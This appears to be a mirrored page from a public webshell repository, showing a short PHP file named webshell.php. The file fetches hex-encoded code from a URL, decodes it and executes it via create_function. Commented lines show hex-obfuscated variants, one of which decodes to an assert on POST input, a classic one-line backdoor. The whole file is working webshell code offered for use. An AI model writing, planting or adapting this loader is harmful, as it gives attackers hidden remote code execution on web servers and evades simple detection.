mirror of
https://github.com/tennc/webshell
synced 2024-11-26 05:00:18 +00:00
11 lines
392 B
PHP
11 lines
392 B
PHP
|
<?php
|
||
|
//webshell.php
|
||
|
//echo pack('H*', base_convert('0011000000111010', 2, 16));
|
||
|
//echo pack('H*', '61737365727428245f504f53545b635d293b');
|
||
|
//call_user_func(create_function(null,'echo (1+2);'));
|
||
|
//call_user_func(create_function(null,'assert($_POST[c]);'));
|
||
|
|
||
|
$url='http://localhost/DebugPHP/getcode.php?call=code';
|
||
|
call_user_func(create_function(null,pack('H*',file_get_contents($url))));
|
||
|
?>
|